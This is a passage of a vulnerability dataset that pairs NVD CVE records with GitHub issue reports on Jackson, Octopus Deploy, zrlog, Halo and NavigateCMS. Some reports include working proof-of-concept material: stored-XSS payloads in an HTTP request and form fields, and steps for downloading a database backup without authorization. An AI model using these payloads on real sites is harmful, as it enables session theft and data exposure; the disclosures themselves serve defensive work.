"versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2814
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `br.com.anteros:Anteros-DBCP` library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-24616 Reporter(s): ChenZhaojun (Security Team of Alibaba Cloud) Fix is included in: * 2.9.10.6 (usable via `jackson-bom` version `2.9.10.20200824`) * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (Anteros-DBCP, CVE-2020-24616)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2814/comments
2
2020-08-11T02:05:43Z
2020-12-02T03:57:22Z
https://github.com/FasterXML/jackson-databind/issues/2814
676,524,402
2,814
1,400
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata by associating a certificate with certain resources that should fail scope validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:octopus:server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932991FE-F2A2-4DBD-B7F8-E3DB79FABD52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6529
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
[CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A credential may be used to access this target if it is applicable to any tenant on this target", and has been changed to, "A credential may be used to access this target only if it is applicable to ALL tenants on this target." For example, given a certificate scoped to Tenant A and a deployment target scoped to Tenant A and Tenant B, the certificate would have previously been permitted to be used by the deployment. To give a more concrete example: with a Kubernetes cluster containing two tenants' application instances, changes made to the cluster can conceivably affect both tenants, so the certificate used to authenticate to the cluster now needs to be scoped to both tenants in order for its use to be permitted. ## Affected versions **Octopus Server: 3.4** (since tenants were introduced). ## Mitigation / Fix 1. If an account/certificate is marked as "Exclude from tenanted deployments", change it to "Include in both tenanted and untenanted deployments". 2. Add any missing tenants to the account/certificate. In some edge cases, it is possible that an account or certificate has been inadvertently reused across tenants where it genuinely should not have been shared. In this case, we recommend that you: - Provision a new account/certificate for each tenant whose infrastructure is completely segregated from the others. - Scope the new account/certificate to just that tenant. In the second scenario, it is feasible as a short-term workaround to follow the same steps as in the first scenario (i.e. scope the credential to all the tenants to mimic previous behavior) until the additional accounts/certificates have been provisioned. ## Links - Original issue (internal): https://trello.com/c/vi2iLTzq/3521-security-bug-in-tenant-scoping-validation - Collective issue (internal): https://trello.com/c/LXuCeOaG/3610-releasing-2020122-2020218-202033-and-latest-of-master-that-has-the-security-fix-tenant-scoping
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6529/comments
0
2020-08-23T12:21:15Z
2022-01-19T01:01:09Z
https://github.com/OctopusDeploy/Issues/issues/6529
684,173,453
6,529
1,401
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata by associating a certificate with certain resources that should fail scope validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:octopus:server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932991FE-F2A2-4DBD-B7F8-E3DB79FABD52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6530
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
This is the 2020.2.18 version of https://github.com/OctopusDeploy/Issues/issues/6529 [CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A credential may be used to access this target if it is applicable to any tenant on this target", and has been changed to, "A credential may be used to access this target only if it is applicable to ALL tenants on this target." For example, given a certificate scoped to Tenant A and a deployment target scoped to Tenant A and Tenant B, the certificate would have previously been permitted to be used by the deployment. To give a more concrete example: with a Kubernetes cluster containing two tenants' application instances, changes made to the cluster can conceivably affect both tenants, so the certificate used to authenticate to the cluster now needs to be scoped to both tenants in order for its use to be permitted. ## Affected versions **Octopus Server: 3.4** (since tenants were introduced). ## Mitigation / Fix 1. If an account/certificate is marked as "Exclude from tenanted deployments", change it to "Include in both tenanted and untenanted deployments". 2. Add any missing tenants to the account/certificate. In some edge cases, it is possible that an account or certificate has been inadvertently reused across tenants where it genuinely should not have been shared. In this case, we recommend that you: - Provision a new account/certificate for each tenant whose infrastructure is completely segregated from the others. - Scope the new account/certificate to just that tenant. In the second scenario, it is feasible as a short-term workaround to follow the same steps as in the first scenario (i.e. scope the credential to all the tenants to mimic previous behavior) until the additional accounts/certificates have been provisioned. ## Links - Original issue (internal): https://trello.com/c/vi2iLTzq/3521-security-bug-in-tenant-scoping-validation - Collective issue (internal): https://trello.com/c/LXuCeOaG/3610-releasing-2020122-2020218-202033-and-latest-of-master-that-has-the-security-fix-tenant-scoping
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6530/comments
0
2020-08-23T12:30:12Z
2022-01-19T01:01:57Z
https://github.com/OctopusDeploy/Issues/issues/6530
684,174,811
6,530
1,402
CVE-2020-16197
2020-08-25T19:15:12.500
An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata by associating a certificate with certain resources that should fail scope validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6529" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6530" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6531" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "9A1A66B5-9F14-49CE-95D6-A64A6D4EDE72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:octopus:server:3.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932991FE-F2A2-4DBD-B7F8-E3DB79FABD52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/OctopusDeploy/Issues/issues/6531
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
This is the 2020.1.22 version of https://github.com/OctopusDeploy/Issues/issues/6529 [CVE-2020-16197](https://nvd.nist.gov/vuln/detail/CVE-2020-16197) ## Description A credential scoped to one tenant could be used to affect another tenant in certain circumstances. Effectively, the logic was previously, "A credential may be used to access this target if it is applicable to any tenant on this target", and has been changed to, "A credential may be used to access this target only if it is applicable to ALL tenants on this target." For example, given a certificate scoped to Tenant A and a deployment target scoped to Tenant A and Tenant B, the certificate would have previously been permitted to be used by the deployment. To give a more concrete example: with a Kubernetes cluster containing two tenants' application instances, changes made to the cluster can conceivably affect both tenants, so the certificate used to authenticate to the cluster now needs to be scoped to both tenants in order for its use to be permitted. ## Affected versions **Octopus Server: 3.4** (since tenants were introduced). ## Mitigation / Fix 1. If an account/certificate is marked as "Exclude from tenanted deployments", change it to "Include in both tenanted and untenanted deployments". 2. Add any missing tenants to the account/certificate. In some edge cases, it is possible that an account or certificate has been inadvertently reused across tenants where it genuinely should not have been shared. In this case, we recommend that you: - Provision a new account/certificate for each tenant whose infrastructure is completely segregated from the others. - Scope the new account/certificate to just that tenant. In the second scenario, it is feasible as a short-term workaround to follow the same steps as in the first scenario (i.e. scope the credential to all the tenants to mimic previous behavior) until the additional accounts/certificates have been provisioned. ## Links - Original issue (internal): https://trello.com/c/vi2iLTzq/3521-security-bug-in-tenant-scoping-validation - Collective issue (internal): https://trello.com/c/LXuCeOaG/3610-releasing-2020122-2020218-202033-and-latest-of-master-that-has-the-security-fix-tenant-scoping
Certificates and accounts associated with tenanted deployment targets are not validated
https://api.github.com/repos/OctopusDeploy/Issues/issues/6531/comments
0
2020-08-23T12:31:17Z
2020-08-26T22:46:20Z
https://github.com/OctopusDeploy/Issues/issues/6531
684,174,965
6,531
1,403
CVE-2020-19005
2020-08-25T22:15:11.537
zrlog v2.1.0 has a vulnerability with the permission check. If admin account is logged in, other unauthorized users can download the database backup file directly.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/commit/b2b4415e2e59b6f18b0a62b633e71c96d63c43ba" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/commit/b2b4415e2e59b6f18b0a62b633e71c96d63c43ba" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/48" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9405174E-51EC-48F0-BF91-16021060B7FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/94fzb/zrlog/issues/48
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
1、There is a vulnerability with the permission check。If admin account is logged in, other unauthorized users can download the database backup file directly。The getuser() function always gets the value PluginHandler.java <img width="1048" alt="101" src="https://user-images.githubusercontent.com/25348551/55862980-300a6180-5bac-11e9-8c72-2070364d7abf.png"> AdminTokenThreadLocal.java <img width="833" alt="102" src="https://user-images.githubusercontent.com/25348551/55863015-3f89aa80-5bac-11e9-8a82-9ba233c695c8.png"> ThreadLocal.java <img width="697" alt="103" src="https://user-images.githubusercontent.com/25348551/55862998-37316f80-5bac-11e9-9cd3-b73888b38472.png"> ## step - Log in using the chrome browser and go to http://118.24.153.47/admin/index#plugin - Using the firefox browser (No login required)and go to http://118.24.153.47/admin/plugins/backup-sql-file/exportSqlFile <img width="867" alt="2-1" src="https://user-images.githubusercontent.com/25348551/55682637-b9315680-5968-11e9-9b05-b2b43f78629f.png"> <img width="867" alt="2-1" src="https://user-images.githubusercontent.com/25348551/55682653-d534f800-5968-11e9-81c3-d371bff5495f.png">
Unauthorized access to download database backup files
https://api.github.com/repos/94fzb/zrlog/issues/48/comments
3
2019-04-07T11:14:36Z
2019-04-14T01:34:27Z
https://github.com/94fzb/zrlog/issues/48
430,132,232
48
1,404
CVE-2020-19007
2020-08-26T14:15:10.637
Halo blog 1.2.0 allows users to submit comments on blog posts via /api/content/posts/comments. The javascript code supplied by the attacker will then execute in the victim user's browser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/547" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/547" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB3E9501-E452-4B2A-AD4A-D803C8A9C40C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/halo-dev/halo/issues/547
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 你好!感谢你正在考虑为 Halo 提交一个 bug。请花一点点时间尽量详细地回答以下基础问题。 谢谢! --> <!-- 请确认你已经做了下面这些事情,若 bug 还是未解决,那么请尽可详细地描述你的问题。 - 我已经安装了最新版的 Halo - 我已经搜索了已有的 Issues 列表中有关的信息 - 我已经搜索了论坛中有关的信息:https://bbs.halo.run - 我已经阅读了 Halo 的 FAQ:https://halo.run/archives/other-faq --> ## Environment Server Version:1.2.0 Admin Version:1.2.0 DataBase:H2 <!-- 请登录到博客后台,进入菜单 `系统->关于` 点击 `环境信息` 旁边的按钮即可复制环境信息。 --> --- ## Vulnerability details <!-- 请登录到博客后台,点击菜单栏中的 `Halo Dashboard` 10 次即可开启 `开发者选项`。进入开发者选项中的 `实时日志`。 你可以选择查找具体的错误日志,或者直接下载日志文件复制到下面即可。(注意:日志堆栈信息请用 Markdown 的代码块语法,以方便查看。) --> Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered. ### step1: submit comment ![image](https://user-images.githubusercontent.com/25348551/74082015-8415f900-4a90-11ea-9e11-cae159277e1a.png) The post packet is as follows: ``` POST /api/content/posts/comments HTTP/1.1 Host: 192.168.0.104:8090 Content-Length: 132 Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 Origin: http://192.168.0.104:8090 Referer: http://192.168.0.104:8090/archives/hello-halo Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1} ``` ### step2: view the blog post After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser. ![image](https://user-images.githubusercontent.com/25348551/74082047-dce59180-4a90-11ea-9282-272729836201.png) ![image](https://user-images.githubusercontent.com/25348551/74082049-e40c9f80-4a90-11ea-92b9-cf0eb635e764.png) code: src/main/java/run/halo/app/controller/content/api/PostController.java ![image](https://user-images.githubusercontent.com/25348551/74082064-0c949980-4a91-11ea-8ff5-0d703cfbc5f5.png) ## Suggestions for repair - Proper encoding of untrusted request data - Rich text filtering uses a common security API library for each programming language - Escaping special characters using the developer's secure escape library <!-- 描述 bug 细节,确认出现此问题的复现步骤,例如点击了哪里,发生了什么情况? 你可以粘贴截图或附件。 -->
Stored xss on Halo blog
https://api.github.com/repos/halo-dev/halo/issues/547/comments
2
2020-02-08T08:43:59Z
2020-03-16T09:15:11Z
https://github.com/halo-dev/halo/issues/547
561,990,601
547
1,405
CVE-2020-23654
2020-08-26T17:15:12.693
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) via the module "Shop."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/**Describe the bug**/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Shop" feature Navigate **/**To Reproduce**/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to 'navigate/navigate.php?fid=dashboard' 3. Go to Moudle "Shop" 4. Chose: - Go to "/navigate/navigate.php?fid=products" - Go to "/navigate/navigate.php?fid=coupons" - Go to "/navigate/navigate.php?fid=brands" - Go to "/navigate/navigate.php?fid=shipping_methods" - Go to "/navigate/navigate.php?fid=payment_methods" 5. Click "Create" >> Insert Payload: '><details/open/ontoggle=confirm(1337)> 6. Save: XSS alert Message! **/**Expected behavior**/** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **/**Impact**/** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **/**Screenshots**/** Info NavigateCMS 2.9: ![info](https://user-images.githubusercontent.com/62001260/84908279-79264180-b0de-11ea-9e68-2f47314fd8bb.PNG) Ex1: Chose go to: "/navigate/navigate.php?fid=products" ![product1](https://user-images.githubusercontent.com/62001260/84908403-9eb34b00-b0de-11ea-97a4-81442ed8eae5.PNG) ![2](https://user-images.githubusercontent.com/62001260/84909018-6102f200-b0df-11ea-9917-d8d3cd797071.PNG) ![3](https://user-images.githubusercontent.com/62001260/84909031-652f0f80-b0df-11ea-961b-f18c61568ad5.PNG) Ex2: Chose go to: "/navigate/navigate.php?fid=coupons" ![4](https://user-images.githubusercontent.com/62001260/84909394-d53d9580-b0df-11ea-895e-8ebdc2ab5949.PNG) ![5](https://user-images.githubusercontent.com/62001260/84909451-e7b7cf00-b0df-11ea-9659-d461071e6d78.PNG) Ex3: Chose go to: "Go to "/navigate/navigate.php?fid=brands" ![6](https://user-images.githubusercontent.com/62001260/84909617-1d5cb800-b0e0-11ea-9761-db20cfbe558a.PNG) ![7](https://user-images.githubusercontent.com/62001260/84909638-20f03f00-b0e0-11ea-875f-69cdf98be3d0.PNG) Ex4: Chose go to: "/navigate/navigate.php?fid=shipping_methods" ![8](https://user-images.githubusercontent.com/62001260/84909819-5563fb00-b0e0-11ea-96ed-a999c4ef3225.PNG) ![9](https://user-images.githubusercontent.com/62001260/84909829-58f78200-b0e0-11ea-92d8-3557355df2d8.PNG) Ex5: Chose go to: "/navigate/navigate.php?fid=payment_methods" ![10](https://user-images.githubusercontent.com/62001260/84910001-8d6b3e00-b0e0-11ea-99ac-ea1872bed9b8.PNG) ![11](https://user-images.githubusercontent.com/62001260/84910012-90fec500-b0e0-11ea-8ea1-e3dc2a8f8cec.PNG) **/**Desktop (please complete the following information):**/** OS: Windows Browser: All **_I Hope you fix it ASAP_**
Cross Site Script Vulnerability on module "Shop" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/10/comments
2
2020-06-17T14:24:49Z
2020-06-18T08:07:07Z
https://github.com/NavigateCMS/Navigate-CMS/issues/10
640,486,199
10
1,406
CVE-2020-23655
2020-08-26T17:15:12.770
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Configuration."
